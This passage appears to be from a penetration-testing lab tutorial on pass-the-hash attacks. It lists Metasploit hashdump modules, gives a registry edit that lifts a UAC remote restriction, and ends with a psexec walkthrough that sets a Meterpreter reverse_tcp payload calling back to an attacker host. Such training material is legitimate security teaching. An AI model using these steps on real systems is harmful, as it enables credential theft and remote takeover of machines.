Sometimes a password will be too long or complex to crack. In that case, you could instead try to pass the hash. In this type of attack, when you log on to the target operating system or application, you provide the user name and the hash of the password, rather than the password itself. You obtain the hash by inducing the operating system or application to dump them from RAM, the Windows Registry, or a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:
post/windows/gather/smart_hashdump post/linux/gather/hashdump post/pro/multi/gather/hashdump post/windows/gather/credentials/domain_hashdump post/windows/gather/credentials/mssql_local_hashdump post/windows/gather/credentials/skype post/windows/gather/credentials/avira_password post/windows/gather/credentials/mcafee_vse_hashdump
Note: To obtain a complete list of hashdump-related Metasploit tools, conduct a search at the Metasploit console, such as search hash platform:windows.
Once you have the hashes, there are several tools you can use to test usability, pass, or crack them, including:
- Metasploit modules exploit/windows/smb/psexec and auxiliary/scanner/smb/smb_login
Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this. You wouldn't even be able to pass the Administrator hash. You would need to turn off Windows Defender first. Separately, if Windows Defender is not running on the target, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.
Note: For information about disabling Windows Defender Credential Guard, see https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage.
Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/
Let's use a Pass-The-Hash attack to gain shell access to the
DATABASE computer without needing to brute force the password plaintext. This is a "feature" of older versions of Windows.
See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on
msf6> use exploit/windows/smb/psexec msf6> set RHOST 172.16.30.88 # The DATABASE host msf6> set SMBUser Administrator msf6> set SMBPass TheHashedPassword msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6> set LHOST 172.16.20.55 # Security-Desk msf6> set LPORT 4445 # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller msf6> exploit -j msf6> sessions